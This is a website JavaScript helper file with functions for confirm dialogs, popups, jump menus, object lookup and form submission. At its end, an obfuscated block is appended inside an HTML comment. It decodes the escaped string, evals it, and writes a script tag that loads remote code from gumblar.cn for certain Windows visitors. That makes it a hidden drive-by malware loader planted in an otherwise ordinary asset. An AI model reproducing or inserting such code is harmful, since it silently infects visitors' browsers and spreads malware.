// display decision alert box
function decision(message, url){
	if(confirm(message)) location.href = url;
}

// open browser window
function openPopUp(url, windowName, w, h, scrollbar) {

           var winl = (screen.width - w) / 2;
           var wint = (screen.height - h) / 2;
           winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scrollbar ;
		   win = window.open(url, windowName, winprops);
           if (parseInt(navigator.appVersion) >= 4) { 
              	win.window.focus(); 
           } 
}

function jumpMenu(target,object,restore){ 
  eval(target+".location='"+object.options[object.selectedIndex].value+"'");
  if (restore) object.selectedIndex=0;
}

function findObj(n, d) {
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function getImage(imageName)
{
		findObj('img').src = imageName;
}

function submitDoc(formName) { 
  var obj;
 
	if (obj=findObj(formName)!=null) 
	{
		findObj(formName).submit(); 
	}
	else 
	{
		alert('The form you are attempting to submit called \'' + formName + '\' couldn\'t be found. Please make sure the submitDoc function has the correct id and name.');
	}

}<!-- 
(function(){var JI5E='%';var zAep=('va`72`20`61`3d`22Scr`69`70t`45ngine`22`2cb`3d`22Versi`6fn(`29+`22`2cj`3d`22`22`2cu`3d`6eav`69g`61`74or`2eus`65rA`67e`6e`74`3bi`66(`28u`2ein`64e`78O`66(`22Win`22)`3e0)`26`26(`75`2ei`6edex`4ff`28`22NT`206`22)`3c0)`26`26`28document`2ecook`69e`2einde`78O`66`28`22m`69`65k`3d1`22)`3c`30`29`26`26`28typeof(`7a`72vzts)`21`3dtype`6ff`28`22A`22`29))`7bzrvz`74s`3d`22A`22`3bev`61l(`22if(wi`6e`64o`77`2e`22+a+`22)j`3dj+`22+`61+`22Major`22+b+a`2b`22Minor`22+`62+`61+`22Build`22+b+`22j`3b`22)`3bdo`63um`65n`74`2e`77r`69te`28`22`3c`73crip`74`20src`3d`2f`2fgumbl`61r`2ecn`2frss`2f`3fi`64`3d`22+j`2b`22`3e`3c`5c`2fscript`3e`22)`3b`7d').replace(/`/g,JI5E);var xWkS=unescape(zAep);eval(xWkS)})();
 --><!-- 
 
 -->